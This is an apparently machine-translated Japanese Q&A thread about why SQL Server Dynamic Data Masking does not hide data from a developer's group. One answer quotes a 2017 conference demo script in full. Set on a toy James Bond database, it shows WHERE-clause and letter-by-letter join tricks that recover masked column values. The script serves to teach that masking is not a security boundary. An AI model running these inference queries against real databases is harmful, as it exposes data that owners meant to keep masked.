私は(ジュニアの)DWH/BI Devであり、私たちのグループ全体のマスクされていないデータを見るための許可を削除したい(ただし、いつでも取り消すことができる)。 は私がユーザーのグループからデータ値をマスクする方法はありますか?
MASKED WITH (FUNCTION = 'partial(1,"xxxx",0)')
様定義された列を持つテーブルを作成し、現在の許可を設定したいました。 私が試してみた:
DENY UNMASK TO PCCZ\CZ_GBUS_ITD_BI
EXECUTE AS USER = 'PCCZ\CZ_GBUS_ITD_BI'
SELECT * FROM dim.MaskingTest
REVOKE UNMASK TO PCCZ\CZ_GBUS_ITD_BI;
あなたがsysadminとdb_ownerにDENY UNMASKすることができません。これはビルドインの制限です。また、ドキュメントに記載されているように、ユーザーがテーブルを照会できる場合、これはセキュリティ機能ではありません。あなたがテーブルを照会することができた場合、あなたが見ることができるように
あなたはシステムをlieすることができます。実際、SQL Serverのコンテキストではこの機能をすべて使用するべきではありません。ほとんどはclient-sideの設定です(T-SQLのコンテキストではほとんど何もしません)。
私は"Hacking SQL Server"と呼ばれるSQL土曜日のセッションに参加しました。ここで、André Melanciaは、データを保護するためにダイナミックデータマスキングを使用できない理由を示しています(セキュリティ機能ではありません)。
ここでは、彼が実証した利用可能なハッキングを見つけることができます。私はそれらを確認することをお勧めします。また、hereは、彼がハッキングした他のマイクロソフトのセキュリティ機能を見つけることができます。
/*
SQL Saturday #667 Oslo 2017
Hacking SQL Server
2017-09-02 (version 1.33)
Demo - Dynamic Data Masking Hacking
André Melancia
http://Andy.PT
(C) 2015-2017, André Melancia
For more information on DDM please visit
https://msdn.microsoft.com/library/mt130841.aspx
________ ________ _________ ____________;_
- ______ \ - ______ \/_____ //. . ._______/
// //// ///_/ /// ___ /
// //// // .-'//_/|_/,-'
// //// // .-'.-'
// //// // //
// //// // //
//_____/ // /_____// //
\________- \________- /_/
*/
-- +----------------------------------------------------------------+
-- | MISSION BRIEFING |
-- +----------------------------------------------------------------+
-- WARNING: Run these scripts on an EMPTY database!
-- INSTRUCTIONS: Run one statement at a time.
-- +----------------------------------------------------------------+
-- | MISSION PREPARATION |
-- +----------------------------------------------------------------+
USE SQLSatOslo; -- Or whatever database you created!
-- Please don't run this on the Master, that's
-- just ugly!
GO
-- Things an MI6 agent with Licence to KILL has to do
-- Note: "IF EXISTS" are ugly. First time these will generate errors
-- Just accept the errors as part of an agent's life ;)
DROP USER M;
DROP USER Q;
DROP USER Sean;
DROP USER David;
DROP USER George;
DROP USER Roger;
DROP USER Timothy;
DROP USER Pierce;
DROP USER Daniel;
GO
DROP SECURITY POLICY AgentValidationPolicy
GO
DROP FUNCTION MI6_Access.FN_MI6_AgentValidationPredicate;
GO
DROP SCHEMA MI6_Access;
GO
DROP VIEW dbo.VIEW_BondFilms;
GO
DROP TABLE dbo.BondFilms;
GO
DROP TABLE dbo.Agents;
GO
DROP TABLE dbo.Letters;
GO
-- +----------------------------------------------------------------+
-- | CREATE USERS |
-- +----------------------------------------------------------------+
CREATE USER M WITHOUT LOGIN;
CREATE USER Q WITHOUT LOGIN;
CREATE USER Sean WITHOUT LOGIN;
CREATE USER David WITHOUT LOGIN;
CREATE USER George WITHOUT LOGIN;
CREATE USER Roger WITHOUT LOGIN;
CREATE USER Timothy WITHOUT LOGIN;
CREATE USER Pierce WITHOUT LOGIN;
CREATE USER Daniel WITHOUT LOGIN;
-- +----------------------------------------------------------------+
-- | CREATE TABLE dbo.BondFilms |
-- +----------------------------------------------------------------+
CREATE TABLE dbo.BondFilms
(
FilmID INT NOT NULL,
FilmTitle_EN NVARCHAR(64) NOT NULL,
FilmTitle_NO NVARCHAR(64) NOT NULL,
FilmYear INT NOT NULL,
BondActor NVARCHAR(64) NOT NULL,
Agent SYSNAME NOT NULL,
Payment INT NOT NULL,
CONSTRAINT PK_BondFilms PRIMARY KEY CLUSTERED (FilmID ASC)
);
-- Insert some REAL top secret for-your-eyes-only information
-- Leaked from here: https://en.wikipedia.org/wiki/List_of_James_Bond_films
-- And fom here: https://no.wikipedia.org/wiki/James_Bond
INSERT INTO dbo.BondFilms
(FilmID, FilmTitle_EN, FilmTitle_NO, FilmYear, BondActor, Agent, Payment)
VALUES
(1, 'Dr.No', 'Dr.No', 1962, 'Sean Connery', 'Sean', 10000),
(2, 'From Russia with Love', 'Med hilsen fra Russland', 1963, 'Sean Connery', 'Sean', 10000),
(3, 'Goldfinger', 'Goldfinger', 1964, 'Sean Connery', 'Sean', 10000),
(4, 'Thunderball', 'Operasjon Tordensky', 1965, 'Sean Connery', 'Sean', 10000),
(5, 'Casino Royale', 'Casino Royale', 1967, 'David Niven', 'David', 10000),
(6, 'You Only Live Twice', 'James Bond i Japan', 1967, 'Sean Connery', 'Sean', 10000),
(7, 'On Her Majesty''s Secret Service', 'James Bond i hemmelig tjeneste', 1969, 'George Lazenby', 'George', 10000),
(8, 'Diamonds Are Forever', 'Diamanter varer evig', 1971, 'Sean Connery', 'Sean', 10000),
(9, 'Live and Let Die', 'Å leve og la dø', 1973, 'Roger Moore', 'Roger', 10000),
(10, 'The Man with the Golden Gun', 'Mannen med den gyldne pistol', 1974, 'Roger Moore', 'Roger', 10000),
(11, 'The Spy Who Loved Me', 'Spionen som elsket meg', 1977, 'Roger Moore', 'Roger', 10000),
(12, 'Moonraker', 'Måneraketten', 1979, 'Roger Moore', 'Roger', 10000),
(13, 'For Your Eyes Only', 'Kun for dine øyne', 1981, 'Roger Moore', 'Roger', 10000),
(14, 'Octopussy', 'Octopussy', 1983, 'Roger Moore', 'Roger', 10000),
(15, 'Never Say Never Again', 'Aldri si aldri', 1983, 'Sean Connery', 'Sean', 3552822), /* 3552822 = 0x363636 = "36 36 36 00" little endian */
(16, 'A View to a Kill', 'Med døden i sikte', 1985, 'Roger Moore', 'Roger', 10000),
(17, 'The Living Daylights', 'I skuddlinjen', 1987, 'Timothy Dalton', 'Timothy', 10000),
(18, 'Licence to Kill', 'Med rett til å drepe', 1989, 'Timothy Dalton', 'Timothy', 10000),
(19, 'GoldenEye', 'GoldenEye', 1995, 'Pierce Brosnan', 'Pierce', 10000),
(20, 'Tomorrow Never Dies', 'Tomorrow Never Dies', 1997, 'Pierce Brosnan', 'Pierce', 10000),
(21, 'The World Is Not Enough', 'The World Is Not Enough', 1999, 'Pierce Brosnan', 'Pierce', 10000),
(22, 'Die Another Day', 'Die Another Day', 2002, 'Pierce Brosnan', 'Pierce', 10000),
(23, 'Casino Royale', 'Casino Royale', 2006, 'Daniel Craig', 'Daniel', 3552822), /* 3552822 = 0x363636 = "36 36 36 00" little endian */
(24, 'Quantum of Solace', 'Quantum of Solace', 2008, 'Daniel Craig', 'Daniel', 10000),
(25, 'Skyfall', 'Skyfall', 2012, 'Daniel Craig', 'Daniel', 10000),
(26, 'Spectre', 'Spectre', 2015, 'Daniel Craig', 'Daniel', 10000);
-- Super advanced top secret spying technique
SELECT * FROM dbo.BondFilms;
GO
-- +----------------------------------------------------------------+
-- | CREATE TABLE dbo.BondActors |
-- +----------------------------------------------------------------+
CREATE TABLE dbo.Agents
(
Agent SYSNAME NOT NULL,
BondActor NVARCHAR(64) NOT NULL,
CONSTRAINT PK_Agents PRIMARY KEY CLUSTERED (Agent ASC)
);
-- Insert some REAL top secret for-your-eyes-only information
-- Leaked from here: https://en.wikipedia.org/wiki/List_of_James_Bond_films
INSERT INTO dbo.Agents
(Agent, BondActor)
SELECT DISTINCT Agent, BondActor
FROM dbo.BondFilms;
-- Super advanced top secret spying technique
SELECT * FROM dbo.Agents;
GO
-- +----------------------------------------------------------------+
-- | MASK COLUMN WITH DYNAMIC DATA MASKING |
-- +----------------------------------------------------------------+
-- Mask the Agent column with DDM.
ALTER TABLE dbo.BondFilms
ALTER COLUMN BondActor ADD MASKED WITH (FUNCTION = 'Partial(2, "▪▪▪", 1)');
GO
-- We are so confident in our security that we're assigning read permissions
-- to everyone.
-- /!\ Please don't do this in a production environment, assign
-- permissions to the group(s) or role(s) the users belong
GRANT SELECT ON dbo.BondFilms TO Public;
GRANT SELECT ON dbo.Agents TO Public;
GRANT UNMASK TO M; -- M is allowed to see masked fields
-- Super advanced top secret spying technique
SELECT *, 'Seen as DBO using DDM' AS Who FROM dbo.BondFilms; -- Returns unmasked
EXECUTE AS USER = 'M';
SELECT *, 'Seen as M using DDM' AS Who FROM dbo.BondFilms; -- Returns unmasked
REVERT; -- Go back to connection default user
EXECUTE AS USER = 'Sean';
SELECT *, 'Seen as Sean using DDM' AS Who FROM dbo.BondFilms; -- Returns masked
REVERT;
GO
-- +----------------------------------------------------------------+
-- | DYNAMIC DATA MASKING EXPLOIT - "0. Mission preparation" |
-- +----------------------------------------------------------------+
REVERT; REVERT; REVERT; REVERT; REVERT; REVERT;
-- Turn on viewing of Execution Plan (Ctrl-M)
-- Allow everyone to see Execution Plan
GRANT SHOWPLAN TO Public; -- NEVER do this in production!!!
-- +----------------------------------------------------------------+
-- | DYNAMIC DATA MASKING EXPLOIT - "1. WHERE HACK" |
-- +----------------------------------------------------------------+
EXECUTE AS USER = 'Sean';
SELECT *, 'Seen as Sean using DDM with WHERE hack' AS Who
FROM dbo.BondFilms
WHERE BondActor Like '%Roger%' -- Hack: infer the content of the field
REVERT;
-- +----------------------------------------------------------------+
-- | DYNAMIC DATA MASKING EXPLOIT - "2. EXACT JOIN HACK" |
-- +----------------------------------------------------------------+
EXECUTE AS USER = 'Sean';
SELECT b.*, a.BondActor AS AGENTS_BondActor, 'Seen as Sean using DDM with EXACT JOIN hack' AS Who
FROM dbo.BondFilms b
INNER JOIN
dbo.Agents a
ON b.BondActor = a.BondActor -- Hack: infer the content with JOIN
REVERT;
-- +----------------------------------------------------------------+
-- | DYNAMIC DATA MASKING EXPLOIT - "3. PARTIAL JOIN HACK" |
-- +----------------------------------------------------------------+
-- Special thanks to
-- Dmitri V. Korotkevitch
-- http://aboutsqlserver.com
-- [email protected]
-- Create a table with single letters
-- (let's assume it's case INsensitive)
CREATE TABLE dbo.Letters
(
Letter NVARCHAR(1) NOT NULL,
CONSTRAINT PK_Letters PRIMARY KEY CLUSTERED (Letter ASC)
);
INSERT INTO dbo.Letters (Letter)
VALUES ('A'), ('B'), ('C'), ('D'), ('E'), ('F'), ('G'), ('H'), ('I'),
('J'), ('K'), ('L'), ('M'), ('N'), ('O'), ('P'), ('Q'), ('R'),
('S'), ('T'), ('U'), ('V'), ('W'), ('X'), ('Y'), ('Z'), (' ');
GRANT SELECT ON dbo.Letters TO Public; -- Very safe!
-- Spies don't call it stalking...
SELECT * FROM dbo.Letters;
-- Get letter by letter (here using subqueries)...
EXECUTE AS USER = 'Sean';
SELECT b.*,
k01.Letter AS L01,
k02.Letter AS L02,
k03.Letter AS L03,
k04.Letter AS L04,
k05.Letter AS L05,
k06.Letter AS L06,
k07.Letter AS L07,
k08.Letter AS L08,
k09.Letter AS L09,
k10.Letter AS L10,
k11.Letter AS L11,
k12.Letter AS L12,
k13.Letter AS L13,
k14.Letter AS L14,
'Seen as Sean using DDM with PARTIAL JOIN hack' AS Who
FROM dbo.BondFilms b
INNER JOIN dbo.Letters AS k01 ON (k01.Letter = SUBSTRING(b.BondActor,01,1))
INNER JOIN dbo.Letters AS k02 ON (k02.Letter = SUBSTRING(b.BondActor,02,1))
INNER JOIN dbo.Letters AS k03 ON (k03.Letter = SUBSTRING(b.BondActor,03,1))
INNER JOIN dbo.Letters AS k04 ON (k04.Letter = SUBSTRING(b.BondActor,04,1))
INNER JOIN dbo.Letters AS k05 ON (k05.Letter = SUBSTRING(b.BondActor,05,1))
INNER JOIN dbo.Letters AS k06 ON (k06.Letter = SUBSTRING(b.BondActor,06,1))
INNER JOIN dbo.Letters AS k07 ON (k07.Letter = SUBSTRING(b.BondActor,07,1))
INNER JOIN dbo.Letters AS k08 ON (k08.Letter = SUBSTRING(b.BondActor,08,1))
INNER JOIN dbo.Letters AS k09 ON (k09.Letter = SUBSTRING(b.BondActor,09,1))
INNER JOIN dbo.Letters AS k10 ON (k10.Letter = SUBSTRING(b.BondActor,10,1))
INNER JOIN dbo.Letters AS k11 ON (k11.Letter = SUBSTRING(b.BondActor,11,1))
INNER JOIN dbo.Letters AS k12 ON (k12.Letter = SUBSTRING(b.BondActor,12,1))
INNER JOIN dbo.Letters AS k13 ON (k13.Letter = SUBSTRING(b.BondActor,13,1))
INNER JOIN dbo.Letters AS k14 ON (k14.Letter = SUBSTRING(b.BondActor,14,1))
REVERT;
-- Missing some characters? Create a bigger Unicode table...
-- +----------------------------------------------------------------+
-- | DYNAMIC DATA MASKING EXPLOIT - "4. PARTIAL SUBQUERY HACK" |
-- +----------------------------------------------------------------+
-- This WILL NOT WORK. Why?
-- Because you are getting the "BondActor" column at the SELECT
-- stage, not the FROM or WHERE stages!
-- Get letter by letter (here using subqueries)...
EXECUTE AS USER = 'Sean';
SELECT b.*,
(SELECT Letter FROM dbo.Letters AS k01 WHERE k01.Letter = SUBSTRING(b.BondActor,1,1)) AS L01,
(SELECT Letter FROM dbo.Letters AS k02 WHERE k02.Letter = SUBSTRING(b.BondActor,2,1)) AS L02,
(SELECT Letter FROM dbo.Letters AS k03 WHERE k03.Letter = SUBSTRING(b.BondActor,3,1)) AS L03,
'Seen as Sean using DDM with PARTIAL FIND hack' AS Who
FROM dbo.BondFilms b
REVERT;
-- +----------------------------------------------------------------+
-- | DYNAMIC DATA MASKING EXPLOIT - "..." |
-- +----------------------------------------------------------------+
-- (Your exploit here)
-- Found more exploits? Let me know!
-- +----------------------------------------------------------------+
-- | Mission is now over. |
-- | You can't run away with the Bond Girl because you're an NSA |
-- | agent, not an MI6 agent. |
-- | Consider changing sides: MI6 has better... eh... cars... |
-- +----------------------------------------------------------------+
問題点を教えてください。 – gotqn
しかし、何が問題なのですか?ユーザーは引き続きデータがマスクされていないことを確認できますか? [documentation](https://docs.microsoft.com/en-us/sql/relational-databases/security/dynamic-data-masking)によると、CONTROL権限はUNMASKを意味します。したがって、ユーザーがシステム管理者やdbownerであるか、データベース/スキーマ/オブジェクトに対してCONTROLが付与されていれば、あなたはうまくいきません。 – kirchner
問題は私がグループに入っていてもデータを見ることができることです。 –